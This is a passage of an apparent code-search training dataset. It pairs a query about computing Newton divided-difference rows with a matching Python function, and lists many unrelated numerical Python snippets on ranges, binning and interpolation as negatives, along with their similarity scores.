x0>x1 and dx>=0:\n raise ValueError(\"invalid parameters: x0>x1 and dx>=0\")\n if x0<x1 and dx<=0:\n raise ValueError(\"invalid parameters: x0<x1 and dx<=0\")\n \n # generate range list\n range_list = []\n x = x0\n while x < x1:\n range_list.append(x)\n x += dx\n return range_list", "def sampler(xaxis, yaxis, vals, x, y):\n i = 0\n while xaxis[i] < x:\n i += 1\n j = 0\n while yaxis[j] < y:\n j += 1\n return vals[i, j]", "def felix_binning(xs, ys, delta=1):\n \n #bins = np.arange(start, end, delta)\n #occurance = np.zeros(start, end, delta)\n BIN_STEP = delta\n BIN_START = xs.min()\n BIN_STOP = xs.max()\n\n indices = xs.argsort()\n datax = xs[indices]\n datay = ys[indices]\n\n print(\"In total we have: \", len(datax), ' data points.')\n #do the binning of the data\n bins = np.arange(BIN_START, BIN_STOP, BIN_STEP)\n print(\"Binning starts: \", BIN_START, ' with step: ', BIN_STEP, ' ENDS: ', BIN_STOP)\n\n bin_i = np.digitize(datax, bins)\n bin_a = np.zeros(len(bins)+1)\n bin_occ = np.zeros(len(bins)+1)\n\n for i in range(datay.size):\n bin_a[bin_i[i]] += datay[i]\n bin_occ[bin_i[i]] += 1\n\n binsx, data_binned = [], []\n for i in range(bin_occ.size-1):\n if bin_occ[i] > 0:\n binsx.append(bins[i]-BIN_STEP/2)\n data_binned.append(bin_a[i]/bin_occ[i])\n\n #non_zero_i = bin_occ > 0\n #binsx = bins[non_zero_i] - BIN_STEP/2\n #data_binned = bin_a[non_zero_i]/bin_occ[non_zero_i]\n\n return binsx, data_binned", "def domain_range(domain, _range=[0, 1], return_transform=False):\n\n if not return_transform:\n return interp1d([min(domain), max(domain)], [min(_range), max(_range)], bounds_error=False)\n else:\n m = interp1d([min(domain), max(domain)], [min(_range), max(_range)])\n return [float(m(v)) for v in domain] # Take float, else returns weird numpy.ndarray element", "def yield_spectral_range(self) -> Tuple[float, float, float]:\n return [min(self.x), max(self.x), len(self.x)]", "def norm_funct(x,min_x,max_x,a=-1,b=1):\n return (b-a)*((x-min_x)/(max_x - min_x)) + a", "def scale_range(x, input_range, target_range):\n\n range = [np.amin(x), np.amax(x)]\n x_std = (x - input_range[0]) / (1.0*(input_range[1] - input_range[0]))\n x_scaled = x_std * (1.0*(target_range[1] - target_range[0])) + target_range[0]\n return x_scaled, range", "def interval_prob(x1, x2, a, b):\n with mp.extradps(5):\n a, b = _validate_a_b(a, b)\n x1 = mp.mpf(x1)\n x2 = mp.mpf(x2)\n if x1 > x2:\n raise ValueError('x1 must not be greater than x2')\n return mp.betainc(a, b, x1, x2, regularized=True)", "def normalize_wrt_x(self):\n\n x_min = min(self.x)\n x_max = max(self.x)\n y_min = min(self.y)\n\n x_range = x_max - x_min\n\n x = np.array(self.x)\n y = np.array(self.y)\n x -= x_min\n y -= y_min\n x = x / float(x_range)\n y = y / float(x_range)\n\n self.x = x.tolist()\n self.y = y.tolist()", "def x_mesh(N,interval):\n (a,b) = interval\n h = (b-a)/N\n xmesh1=[a]\n for i in range(1,N):\n xmesh1.append(a+i*h)\n xmesh1.append(b)\n xmesh2=xmesh1[1:N]\n \n return xmesh1,xmesh2", "def xi(a):\n return xrange(len(a))", "def get_xrange_indices(self, lower, upper) -> Tuple[int, int]:\n lower_index = np.argmax(self.x >= lower)\n upper_index = np.argmax(self.x >= upper)\n return int(lower_index), int(upper_index)", "def plot(self, center=0, xmin=-1, xmax=1):\n n = 200./self.eps\n x = concatenate(\n linspace(xmin, center-self.eps, 21),\n linspace(center-self.eps, center+self.eps, n+1),\n linspace(center+self.eps, xmax, 21))\n y = self(x)\n return x, y", "def in_range(x, a, b):\n return (x >= a and x <= b) or (x <= a and x >= b)", "def external2internal(xe,bounds):\n\n xi = np.empty_like(xe)\n\n for i,(v,bound) in enumerate(zip(xe,bounds)):\n \n a = bound[0] # minimum\n b = bound[1] # maximum\n\n if a == None and b == None: # No constraints\n xi[i] = v\n\n elif b == None: # only min\n xi[i] = np.sqrt( (v-a+1.)**2.-1 )\n\n elif a == None: # only max\n xi[i] = np.sqrt( (b-v+1.)**2.-1 )\n\n else: # both min and max\n xi[i] = np.arcsin( (2.*(v-a)/(b-a))-1.)\n\n return xi", "def calcBRange(c,n=10):\n \n bMin = -abs(c)/2.0 \n bMax = abs(c)/2.0 \n return np.linspace(bMin,bMax,n)", "def simulate_x_values(self, minimum = -10, maximum = 10, length = 100):\n return np.sort(np.random.uniform(minimum, maximum, length) )", "def execute():\n # Create a list of evenly-spaced numbers over the range\n x_axis = np.linspace(0, 20, 100)\n plt.plot(x_axis, np.sin(x_axis)) # Plot the sine of each x point\n plt.show()", "def query_range(tree, start_y, start_x, end_y, end_x):\n res = 0\n start_y -= 1\n\n while end_y > start_y:\n res += bit.query_range(tree[end_y], start_x, end_x)\n end_y -= (end_y & -end_y)\n\n while start_y > end_y:\n res -= bit.query_range(tree[start_y], start_x, end_x)\n start_y -= (start_y & -start_y)\n\n return res", "def partition(X: np.ndarray, y: np.ndarray, num_partitions: int) -> XYList: # returns list of Xy (read more about function annotations) ????\n return list(\n zip(np.array_split(X, num_partitions), \n np.array_split(y, num_partitions))\n )", "def eulers_method(f, y, dx, range):\n x = min(range)\n y_space = [y]\n x_space = [x]\n while x<=max(range):\n y += f(x, y)*dx\n x += dx\n x_space.append(x)\n y_space.append(y)\n return (x_space, y_space)", "def drange(x, y, jump):\n while x < y:\n yield float(x)\n x += decimal.Decimal(jump)", "def getScaleValues(a, x):\n raise NotImplementedError('getScaleValues not implemented')", "def range14(self, nx, ny, x_des):\n [c_d, a1, output] = [self.component_dependency['y_14'], self.dependency_matrix, []]\n for i in range(ny):\n [sum_i, row] = [[], a1[3 * ny + i]]\n sum_i.append(np.sum(row))\n [assign, y] = [c_d[i], []]\n # :x_des = np.random.random_sample(4 * nx + 5 * ny) # this is an instance of the design vector\n [y.append(self.per_int.range_int([x_des[k]])) for k in range(4 * nx + 5 * ny) if row[k] == 1]\n output.append(np.sum(y) * 1 / sum_i)\n print (c_d)\n\n return output", "def split(self, X: tp.ArrayLike, n: tp.Optional[int] = None, range_len: tp.Optional[float] = None,\n min_len: int = 1, start_idxs: tp.Optional[tp.ArrayLike] = None,\n end_idxs: tp.Optional[tp.ArrayLike] = None, **kwargs) -> RangesT:\n X = to_any_array(X)\n if isinstance(X, (pd.Series, pd.DataFrame)):\n index = X.index\n else:\n index = pd.Index(np.arange(X.shape[0]))\n\n # Resolve start_idxs and end_idxs\n if start_idxs is None and end_idxs is None:\n if range_len is None and n is None:\n raise ValueError(\"At least n, range_len, or start_idxs and end_idxs must be set\")\n if range_len is None:\n range_len = len(index) // n\n if 0 < range_len < 1:\n range_len = math.floor(range_len * len(index))\n start_idxs = np.arange(len(index) - range_len + 1)\n end_idxs = np.arange(range_len - 1, len(index))\n elif start_idxs is None or end_idxs is None:\n raise ValueError(\"Both start_idxs and end_idxs must be set\")\n else:\n if isinstance(start_idxs, pd.Index):\n start_idxs = np.asarray([find_first_occurrence(idx, index) for idx in start_idxs])\n else:\n start_idxs = np.asarray(start_idxs)\n if isinstance(end_idxs, pd.Index):\n end_idxs = np.asarray([find_first_occurrence(idx, index) for idx in end_idxs])\n else:\n end_idxs = np.asarray(end_idxs)\n\n # Filter out short ranges\n start_idxs, end_idxs = np.broadcast_arrays(start_idxs, end_idxs)\n range_lens = end_idxs - start_idxs + 1\n min_len_mask = range_lens >= min_len\n if not np.any(min_len_mask):\n raise ValueError(f\"There are no ranges that meet range_len>={min_len}\")\n start_idxs = start_idxs[min_len_mask]\n end_idxs = end_idxs[min_len_mask]\n\n # Evenly select n ranges\n if n is not None:\n if n > len(start_idxs):\n raise ValueError(f\"n cannot be bigger than the maximum number of ranges {len(start_idxs)}\")\n idxs = np.round(np.linspace(0, len(start_idxs) - 1, n)).astype(int)\n start_idxs = start_idxs[idxs]\n end_idxs = end_idxs[idxs]\n\n return split_ranges_into_sets(start_idxs, end_idxs, **kwargs)", "def ticks(self, start, end, desired_ticks=8):\n if start == end or isnan(start) or isnan(end):\n return [start]\n min, max, delta = heckbert_interval(start, end, desired_ticks, enclose=True)\n return frange(min, max, delta)", "def test_linear_interpolation_range(self):\n\n for x in [[1.0, 2.0, 4.0], [-20, -19, 0], numpy.arange(200) + 1000]:\n for y in [[5.0, 9.0], [100, 200, 10000]]:\n\n # Define ny by nx array with corresponding values\n A = numpy.zeros((len(x), len(y)))\n\n # Define values for each x, y pair as a linear function\n for i in range(len(x)):\n for j in range(len(y)):\n A[i, j] = linear_function(x[i], y[j])\n\n # Test that linearly interpolated points are correct\n xis = numpy.linspace(x[0], x[-1], 100)\n etas = numpy.linspace(y[0], y[-1], 100)\n points = combine_coordinates(xis, etas)\n\n vals = interpolate2d(x, y, A, points, mode='linear')\n refs = linear_function(points[:, 0], points[:, 1])\n assert numpy.allclose(vals, refs, rtol=1e-12, atol=1e-12)", "def g_rosenbrock(x, a=1, b=100):\n\n g = np.array(\n [\n -2 * a - 4 * b * x[0] * (-x[0] ** 2 + x[1]) + 2 * x[0],\n b * (-2 * x[0] ** 2 + 2 * x[1]),\n ]\n )\n\n return g", "def range34(self, nx, ny, x_des):\n [c_d, a1, output] = [self.component_dependency['y_34'], self.dependency_matrix, []]\n for i in range(ny):\n [sum_i, row] = [[], a1[11 * ny + 2 * nx + i]]\n sum_i.append(np.sum(row))\n [assign, y] = [c_d[i], []]\n # :x_des = np.random.random_sample(4 * nx + 5 * ny) # this is an instance of the design vector\n [y.append(self.per_int.range_int([x_des[k]])) for k in range(4 * nx + 5 * ny) if row[k] == 1]\n output.append(np.sum(y) * 1 / sum_i)\n\n return output", "def _lagrange(x, y):\n x_col, x_row = np.meshgrid(x, x)\n diff_x = x_col - x_row + np.eye(len(x))\n n = len(x)\n indices = np.eye(n) == 0\n\n def P(x_ip):\n l = np.zeros((n, x_ip.shape[0]))\n for idx, idxs in enumerate(indices):\n l[idx] = np.prod((x_ip[:, None] - x[idxs]) / diff_x[idxs, idx], axis=1)\n\n return np.sum(y * l.T, axis=1)\n\n return P", "def bapply(x,y,bins,func):\n \n assert bins[0] <= min(x),'range'\n assert bins[-1] > max(x),'range'\n\n bid = np.digitize(x,bins) \n nbins = bins.size-1\n yapply = np.zeros(nbins)\n\n for id in range(1,nbins):\n yb = y[bid==id]\n yapply[id-1] = func(yb)\n\n return yapply", "def ticks(self, start, end, desired_ticks=8):\n if start == end or isnan(start) or isnan(end):\n return [start]\n min, max, delta = heckbert_interval(start, end, desired_ticks,\n nicefunc=self._nice_pow10,\n enclose = True)\n return frange(min, max, delta)", "def generate_random_scatter(x_range, w, b, k):\n\tx_1 = []\n\ty_1 = []\n\tx_2 = []\n\ty_2 = []\n\tfor i in range(k):\n\t\txx = random.random() * (x_range[1] - x_range[0]) + x_range[0]\n\t\tx_1.append(xx)\n\t\tamplitude = random.randint(4, 15)\n\t\tyy = w * xx + b + amplitude\n\t\ty_1.append(yy)\n\n\t\txx = random.random() * (x_range[1] - x_range[0]) + x_range[0]\n\t\tx_2.append(xx)\n\t\tamplitude = random.randint(4, 15)\n\t\tyy = w * xx + b - amplitude\n\t\ty_2.append(yy)\n\treturn x_1, y_1, x_2, y_2", "def inrange ( a , x , b ) :\n _a = float(a)\n _b = float(b)\n _x = float(x)\n return ( _a <= _x or isequal ( _a , _x ) ) and ( _x <= _b or isequal ( _x , _b ) )", "def Calc(self, a, b, size):\n self.eq = lambda x: (60000/((b-a)/size*x+a))\n points = []\n names = [str(self.offset)]\n points.append(0)\n for j in range(1, int(size)):\n points.append(integrate.quad(self.eq,0,j)[0])\n names.append(str(points[-1]+self.offset))\n self.beatstr = ' '.join(names)\n return points", "def get_xrange(self) -> np.array:\n # todo: ensure this functions work as well for y_values\n lower, upper = self.get_xrange_indices()\n return self.x[lower, upper + 1]", "def startEndPoints(start, end, num):\n ll = np.linspace(0,1,num)\n xxs = start[0]*(1-ll)+end[0]*ll\n tts = start[1]*(1-ll)+end[1]*ll\n return( np.array([xxs, tts]) )", "def g_batched_rosenbrock(\n x: np.ndarray, num_batches: int, a: np.ndarray, b: np.ndarray\n) -> np.ndarray:\n gall = np.zeros(2 * num_batches)\n for i in range(num_batches):\n gall[i * 2 : (i + 1) * 2] = g_rosenbrock(\n x[i * 2 : (i + 1) * 2], a[i], b[i]\n )\n\n return gall", "def profileY(xdata, ydata, nbins, yrange=None, xrange=None, drop_nan=True):\n xmin, xmax = (np.min(xdata), np.max(xdata)) if xrange is None else xrange\n ymin, ymax = (np.min(ydata), np.max(ydata)) if yrange is None else yrange\n\n x_out = np.linspace(ymin, ymax, nbins+1)\n y_out = np.empty(nbins)\n y_err = np.empty(nbins)\n dx = np.diff(x_out)[0]\n\n selection = in_range(xdata, xmin, xmax) & in_range(ydata, ymin, ymax)\n xdata, ydata = xdata[selection], ydata[selection]\n for i in range(nbins):\n bin_data = np.extract(in_range(ydata, x_out[i], x_out[i+1]), xdata)\n y_out[i] = np.mean(bin_data)\n y_err[i] = np.std(bin_data) / bin_data.size**0.5\n x_out += dx / 2.\n x_out = x_out[:-1]\n if drop_nan:\n selection = ~(np.isnan(y_out) | np.isnan(y_err))\n x_out = x_out[selection]\n y_out = y_out[selection]\n y_err = y_err[selection]\n return x_out, y_out, y_err", "def plot(self, aVals, bVals):\n with self.pt as sp:\n # Top subplot: The range of interest\n X = np.linspace(self.xMin, self.xMax, self.N)\n self.subplot(sp, X, aVals, bVals)\n # Bottom subplot: Positive X surrounding the range of\n # interest\n X = np.linspace(0, 2*self.xMax, self.N)\n sp.add_axvline(self.xMin)\n sp.add_axvline(self.xMax)\n self.subplot(sp, X, aVals, bVals, semilog=True)\n self.pt.show()", "def get_x_in_range(self, start, target_func, max_distance, sort_func=None):\n if sort_func is None:\n targets = []\n for x in range(-max_distance, max_distance + 1):\n for y in range(-max_distance, max_distance + 1):\n distance = abs(x) + abs(y)\n if distance > max_distance:\n continue\n pos = Position(start.x + x, start.y + y)\n if target_func(pos, distance):\n targets.append(pos)\n return targets\n else:\n targets = PriorityQueue()\n for x in range(-max_distance, max_distance + 1):\n for y in range(-max_distance, max_distance + 1):\n distance = abs(x) + abs(y)\n if distance > max_distance:\n continue\n pos = Position(start.x + x, start.y + y)\n if target_func(pos, distance):\n targets.enqueue(sort_func(pos, distance), pos)\n return targets.to_list()", "def from_inclusive(a, b):\n c = int(b > a)*2-1\n return range(a, b+c, c)", "def get_xrange(self):\n return self.xvec[0], self.xvec[-1]", "def function_to_XYs(func, fpars,\n Egrid=equal_bins(100),\n domainUnit='eV', domainName='energy_in', rangeUnit='b', rangeName='crossSection',\n accuracy=upperEps):\n return XYs1dModule.XYs1d.createFromFunction(\n XYs1d.defaultAxes(labelsUnits={\n XYs1dModule.yAxisIndex: (rangeName, rangeUnit),\n XYs1dModule.xAxisIndex: (domainName, domainUnit)}),\n Xs=Egrid,\n func=func,\n parameters=fpars,\n accuracy=accuracy,\n biSectionMax=20,\n checkForRoots=False,\n infill=1,\n safeDivide=1)", "def val_split(a: Iterable, partitions: int, range_max: int, range_min: int = 0,\n size: bool = True) -> List[np.ndarray]:\n if size:\n n = int(np.ceil(range_max / partitions))\n splits = partitions\n else:\n n = partitions\n splits = (range_max - range_min) // partitions\n\n it = iter(a)\n it_current = next(it)\n ret_val = [[] for _ in range(n)]\n\n try:\n if isinstance(it_current, (tuple, list, np.ndarray)):\n it_current, it_value = it_current\n for i in range(n):\n for j in range(splits):\n split_current = (partitions + 1) * i + j\n while it_current <= split_current:\n ret_val[i].append([it_current, it_value])\n it_current, it_value = next(it)\n continue\n return list(map(np.array, ret_val))\n for i in range(n):\n for j in range(splits):\n split_current = (partitions + 1) * i + j\n while it_current <= split_current:\n ret_val[i].append(it_current)\n it_current = next(it)\n continue\n except StopIteration:\n return list(map(np.array, ret_val))", "def _ScatterXUniformlyExtendedRange(self, num_points, lattice_sizes,\n input_dims):\n x = []\n for _ in range(num_points):\n point = [\n np.random.random() * (lattice_sizes + 1.0) - 1.0\n for _ in range(input_dims)\n ]\n x.append(np.asarray(point))\n if input_dims == 1:\n x.sort()\n return x", "def pmm(a, *b):\n ind = np.isfinite(a)\n try:\n ans = [[ np.min(a[ind]), np.max(a[ind]) ]]\n except TypeError:\n a_tmp = np.asarray(a)\n ans = [[ np.min(a_tmp[ind]), np.max(a_tmp[ind]) ]]\n for val in b:\n ind = np.isfinite(val)\n try:\n ans.append( [np.min(val[ind]), np.max(val[ind])] )\n except TypeError:\n val_tmp = np.asarray(val)\n ans.append( [np.min(val_tmp[ind]), np.max(val_tmp[ind])] )\n return ans", "def plot(self, xmin=-1, xmax=1):\n if xmin > self.L or xmax < self.R:\n raise ValueError('xmin=%g > L=%g or xmax=%g < R=%g is meaningless for plot' % (xmin, self.L, xmax, self.R))\n\n if self.eps == 0:\n return [xmin, L, L, R, R, xmax], [0, 0, 1, 1, 0, 0]\n else:\n n = 200./self.eps\n x = concatenate(\n linspace(xmin, self.L-self.eps, 21),\n linspace(self.L-self.eps, self.R+self.eps, n+1),\n linspace(self.R+self.eps, xmax, 21))\n y = self(x)\n return x, y", "def domain(self):\n lower, upper = sorted((self.x1, self.x2))\n return FloatRange(lower=lower, upper=upper)", "def toPointwise_withLinearXYs( self, **kwargs ) :\n\n return( XYs1d( data = [ [ self.domainMin, self.value ], [ self.domainMax, self.value ] ], axes = self.axes ) )", "def XbarTXbar(d, A=None, B=None):\n n = len(d) + 1\n if A is None: A = np.arange(n-1)\n if B is None: B = np.arange(n-1)\n V = np.empty((len(A), len(B)))\n for i, j in itt.product(range(len(A)), range(len(B))):\n a, b = A[i], B[j]\n u, v = _minmax(a, b)\n V[i, j] = d[a] * d[b] * (u * (n - v)) / n\n return V", "def sum_range(self, lower, upper):\n if upper>self.upper:\n upper=self.upper\n if lower<self.lower:\n lower = self.lower\n\n i_l = int(np.floor((lower-self.lower)/self._dx))\n i_u = int(np.floor((upper-self.lower)/self._dx))\n total = 0.0\n for i in range(i_l,i_u):\n total+= self.y[i]\n return total", "def get_range(min, max, intervals, log):\n if not log:\n min = float(min)\n max = float(max)\n difference = max-min\n step_size = difference/intervals\n output = [min + i*step_size for i in range(intervals+1)]\n return output\n else:\n from math import log10 as log\n log_min = log(min)\n log_max = log(max)\n log_difference = log_max - log_min\n step_size = log_difference/intervals\n output = [pow(10, log_min + i*step_size) for i in range(intervals+1)]\n return output", "def _grid_from_X(X, percentiles, grid_resolution, custom_range):\n values = []\n for feature in X.columns:\n if feature in custom_range:\n # Use values in the custom range\n feature_range = custom_range[feature]\n if not isinstance(feature_range, (np.ndarray, pd.Series)):\n feature_range = np.array(feature_range)\n if feature_range.ndim != 1:\n raise ValueError(\n \"Grid for feature {} is not a one-dimensional array. Got {}\"\n \" dimensions\".format(feature, feature_range.ndim)\n )\n axis = feature_range\n else:\n uniques = np.unique(X.loc[:, feature])\n if uniques.shape[0] < grid_resolution:\n # feature has low resolution use unique vals\n axis = uniques\n else:\n # create axis based on percentiles and grid resolution\n emp_percentiles = mquantiles(\n X.loc[:, feature], prob=percentiles, axis=0\n )\n if np.allclose(emp_percentiles[0], emp_percentiles[1]):\n raise ValueError(\n \"percentiles are too close to each other, \"\n \"unable to build the grid. Please choose percentiles \"\n \"that are further apart.\"\n )\n axis = np.linspace(\n emp_percentiles[0],\n emp_percentiles[1],\n num=grid_resolution,\n endpoint=True,\n )\n values.append(axis)\n\n return _cartesian(values), values", "def create_data(f, x_vals):\n y_vals = []\n for i in x_vals:\n y_vals.append(f(x_vals[i]))\n return np.array(y_vals)", "def local_mean(x,y, n=10):\n\n xx, yy = (list(t) for t in zip(*sorted(zip(x, y)))) # sort x and y after x\n\n m = int(len(x)/n) # Number of data points in each group\n\n x_o, y_o = [], []\n x_sum, y_sum, v = 0, 0, 0\n j=1\n for i in range(len(x)):\n if v < m:\n x_sum += xx[i]\n y_sum += yy[i]\n v += 1\n else:\n x_o.append(x_sum/m)\n y_o.append(y_sum/m)\n x_sum, y_sum, v = 0, 0, 0\n j += 1\n\n return x_o, y_o", "def create_graph_from_lambda(f, xrange):\n out = []\n for x in xrange:\n out.append(f(x))\n return out", "def data_range(x):\n return max(x)-min(x)", "def averages(x,y):\n new_x = [x[0]]\n new_y = []\n\n cur_x = new_x[0]\n cur_ys = []\n for x_i, y_i in zip(x,y):\n if x_i == cur_x:\n cur_ys.append(y_i)\n else:\n new_y.append( sum(cur_ys)/float(len(cur_ys) ) )\n new_x.append( x_i )\n cur_ys = [y_i]\n cur_x = x_i\n new_y.append( sum(cur_ys)/float(len(cur_ys) ) )\n return new_x, new_y", "def range24(self, nx, ny, x_des):\n [c_d, a1, output] = [self.component_dependency['y_24'], self.dependency_matrix, []]\n for i in range(ny):\n [sum_i, row] = [[], a1[7 * ny + nx + i]]\n sum_i.append(np.sum(row))\n [assign, y] = [c_d[i], []]\n # :x_des = np.random.random_sample(4 * nx + 5 * ny) # this is an instance of the design vector\n [y.append(self.per_int.range_int([x_des[k]])) for k in range(4 * nx + 5 * ny) if row[k] == 1]\n output.append(np.sum(y) * 1 / sum_i)\n\n return output", "def makeLinearFunc(xList, startXY, endXY, middleXY=None):\r\n\r\n \"\"\" Make one or two linear functions from given coordinates\r\n and return the values (as a dict) for the x-values found in\r\n the xList. \"\"\"\r\n\r\n x1, y1 = startXY\r\n try: x2, y2 = middleXY\r\n except: pass\r\n x3, y3 = endXY\r\n\r\n # Always sort list first.\r\n xList.sort()\r\n # Don't extrapolate values - only calculate intermediate values!\r\n xList = xList[xList.index(x1):xList.index(x3)+1]\r\n\r\n # The dict holding the final X- and Y-values.\r\n xyDict = {}\r\n\r\n # Iterate through all distances and stop when distUnit==middleX\r\n # and/or when distUnit/100==endX.\r\n for x in xList:\r\n # Define the straight line\r\n # Based on: f(x) = y1 + [(y2 - y1) / (x2 - x1)]·(x - x1)\r\n # And then assign the value to the xyList\r\n\r\n # If no middle was defined, give values based on two equations.\r\n if middleXY != None:\r\n if x<=x2:\r\n val = y1 + ( float((y2 - y1))/(x2 - x1) ) * (x - x1)\r\n else:\r\n val = y2 + ( float((y3 - y2))/(x3 - x2) ) * (x - x2)\r\n\r\n # Else, give all values based on one equation.\r\n else:\r\n val = y1 + ( float((y3 - y1)) / (x3 - x1) ) * (x - x1)\r\n\r\n xyDict[x] = round(val, 2) # The y-value is rounded to 2 decimals\r\n if x >= x3: # don't define influence beyond end point.\r\n break\r\n\r\n # Return a dict with y-values keyed by x-values.\r\n return xyDict", "def interval_split(a,b,split_ps):\n ps = [a] + [s for s in sorted(split_ps) if a < s < b] + [b]\n return [(p1,p2) for p1,p2 in zip(ps,ps[1:])]", "def expand_ranges(ranges):\n for low, high in low_high_pairs:\n for j in range(low, high+1):\n yield j", "def compute_rlzn_ensemble(fopen_list, var_list, range_list): #{{{\n\n sumprod = 0.0\n\n for afile in fopen_list:\n prodvars = 1.0\n for avar,arange in zip(var_list,range_list):\n if isinstance(avar,str):\n # open value in netCDF4 database\n var_value = afile.variables[avar]\n else:\n var_value = avar\n \n if arange is None:\n if hasattr(var_value, \"__len__\"): \n try:\n prodvars *= var_value[:]\n except:\n tmp = var_value[:]\n prodvars *= tmp[np.newaxis,:]\n del tmp\n else:\n prodvars *= var_value\n else:\n prodvars *= var_value[arange]\n\n sumprod += prodvars\n\n # compute ensemble with unbiased estimator\n ensmbl = sumprod/(len(fopen_list)-1)\n\n return ensmbl #}}}" ]
[ "0.58776325", "0.5662537", "0.5642036", "0.5495832", "0.5469611", "0.5420076", "0.5375376", "0.53669316", "0.53453207", "0.53439814", "0.53289247", "0.5299425", "0.5295588", "0.52585924", "0.52468276", "0.5246785", "0.5245637", "0.5245567", "0.52296543", "0.5221779", "0.5213703", "0.5212454", "0.5208512", "0.52083296", "0.5201708", "0.5194486", "0.51711047", "0.5168863", "0.5165443", "0.5120755", "0.5114761", "0.5102751", "0.50785375", "0.5054189", "0.505072", "0.50472754", "0.50416267", "0.503469", "0.5019454", "0.5018101", "0.5010577", "0.5008813", "0.50058043", "0.5002213", "0.49998733", "0.4996806", "0.49906522", "0.49867833", "0.49822482", "0.4981303", "0.4980911", "0.49784392", "0.49747497", "0.49691847", "0.49691364", "0.49657494", "0.49621314", "0.49519378", "0.4946871", "0.49463037", "0.4942811", "0.49422556", "0.4934619", "0.49313468", "0.4926717", "0.49265236", "0.49243584", "0.4921028", "0.49185663", "0.49176183", "0.49169987", "0.49095422", "0.4908786", "0.49083984", "0.4907138", "0.4887863", "0.48860237", "0.48834684", "0.48813796", "0.4877188", "0.48745123", "0.48739085", "0.48698267", "0.48692703", "0.4865313", "0.48593545", "0.48577893", "0.48567805", "0.48494112", "0.48477614", "0.4838593", "0.4832895", "0.48318925", "0.48307568", "0.48277205", "0.48213023", "0.48212478", "0.48207626", "0.48200655", "0.48200542" ]
0.58207065
1
Takes list of divided differences nodes and calculates new divided differences node from each pair of nodes_to_compute. In other words, it computes next level of so called Newton's second interpolation form tree.
def calculate_divided_differences_row(nodes_to_compute): divided_differences = [] if len(nodes_to_compute) == 1: return None for i in range(0, len(nodes_to_compute) - 1): child = DividedDifferenceNode.create_child_node(nodes_to_compute[i], nodes_to_compute[i + 1]) child.calculate_value() divided_differences.append(child) for node in divided_differences: print(node, end='') print('\n') return divided_differences
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def calculate_divided_differences(nodes):\n nodes_to_compute = []\n divided_differences = []\n for node in nodes:\n nodes_to_compute.append(DividedDifferenceNode(x=node[0], divided_difference=node[1]))\n\n divided_differences.append(tuple(nodes_to_compute))\n\n while len(nodes_to_compute) > 1:\n next_node_row = calculate_divided_differences_row(nodes_to_compute)\n divided_differences.append(tuple(next_node_row))\n nodes_to_compute = next_node_row\n\n return divided_differences", "def calculate_newton_interpolation(divided_differences):\n polynomial = []\n for i, divided_differences_row in enumerate(divided_differences):\n polynomial_part = '({0})'.format(divided_differences_row[0].divided_difference)\n\n for j in range(0, i):\n polynomial_part += '*(x-{0})'.format(divided_differences[0][j].x)\n\n polynomial_part += '+'\n polynomial.append(polynomial_part)\n polynomial_str = ''.join(polynomial)[:-1]\n\n print('Calculated polynomial: {0}'.format(polynomial_str))\n # Heuristic simplification of calculated polynomial\n simplified_polynomial = sy.simplify(polynomial_str)\n print(\"Simplified polynomial: {0}\".format(simplified_polynomial))\n return simplified_polynomial", "def compute_relations(nodes: List[Node]) -> None:\n # Calculate parents\n for node in nodes:\n node.parents = []\n for node in nodes:\n for child in node.children():\n child.parents.append(node)\n\n def compute_dominators(\n entry: Node,\n parents: Callable[[Node], List[Node]],\n dominators: Callable[[Node], Set[Node]],\n immediately_dominates: Callable[[Node], List[Node]],\n set_immediate_dominator: Callable[[Node, Optional[Node]], None],\n ) -> None:\n # See https://en.wikipedia.org/wiki/Dominator_(graph_theory)#Algorithms\n # Note: if `n` is unreachable from `entry`, then *every* node will\n # vacuously belong to `n`'s dominator set.\n for n in nodes:\n dominators(n).clear()\n if n == entry:\n dominators(n).add(n)\n else:\n dominators(n).update(nodes)\n\n changes = True\n while changes:\n changes = False\n for node in nodes:\n if node == entry:\n continue\n nset = dominators(node)\n for parent in parents(node):\n nset = nset.intersection(dominators(parent))\n nset.add(node)\n if len(nset) < len(dominators(node)):\n assert nset.issubset(dominators(node))\n dominators(node).intersection_update(nset)\n changes = True\n\n # Compute immediate dominator, and the inverse relation\n for node in nodes:\n immediately_dominates(node).clear()\n for node in nodes:\n doms = dominators(node).difference({node})\n # If `node == entry` or the flow graph is not reducible, `doms` may be empty.\n # TODO: Infinite loops could be made reducible by introducing\n # branches like `if (false) { return; }` without breaking semantics\n if doms:\n # There should be a unique max `len(dominators(d))` if the flowgraph\n # is reducible. Fall back to largest index for irreducible graphs.\n imdom = max(doms, key=lambda d: (len(dominators(d)), d.block.index))\n immediately_dominates(imdom).append(node)\n set_immediate_dominator(node, imdom)\n else:\n set_immediate_dominator(node, None)\n for node in nodes:\n immediately_dominates(node).sort(key=lambda x: x.block.index)\n\n def _set_immediate_dominator(node: Node, imdom: Optional[Node]) -> None:\n node.immediate_dominator = imdom\n\n def _set_immediate_postdominator(node: Node, impdom: Optional[Node]) -> None:\n node.immediate_postdominator = impdom\n\n entry = nodes[0]\n terminal = nodes[-1]\n assert isinstance(terminal, TerminalNode)\n\n # Compute dominators & immediate dominators\n compute_dominators(\n entry=entry,\n parents=lambda n: n.parents,\n dominators=lambda n: n.dominators,\n immediately_dominates=lambda n: n.immediately_dominates,\n set_immediate_dominator=_set_immediate_dominator,\n )\n\n # Compute postdominators & immediate postdominators\n # This uses the same algorithm as above, but with edges reversed\n compute_dominators(\n entry=terminal,\n parents=lambda n: n.children(),\n dominators=lambda n: n.postdominators,\n immediately_dominates=lambda n: n.immediately_postdominates,\n set_immediate_dominator=_set_immediate_postdominator,\n )\n\n # Iterate over all edges n -> c and check for backedges, which define natural loops\n for node in nodes:\n for child in node.children():\n if child not in node.dominators:\n continue\n # Found a backedge node -> child where child dominates node; child is the \"head\" of the loop\n if child.loop is None:\n child.loop = NaturalLoop(child)\n child.loop.nodes |= {child, node}\n child.loop.backedges.add(node)\n for parent in nodes:\n if reachable_without(parent, node, child):\n child.loop.nodes.add(parent)", "def compute_tree(self, tree):\n g_list_val, g_list_h = self._build_graph(tree) # return theano variable of each node\n list_val = self._traversal_tree(tree) #\n f = theano.function(g_list_val, g_list_h, allow_input_downcast=True)\n result = f(*list_val)\n return result", "def gradients(output_node, node_list):\r\n\r\n # a map from node to a list of gradient contributions from each output node\r\n node_to_output_grads_list = {}\r\n # Special note on initializing gradient of output_node as oneslike_op(output_node):\r\n # We are really taking a derivative of the scalar reduce_sum(output_node)\r\n # instead of the vector output_node. But this is the common case for loss function.\r\n 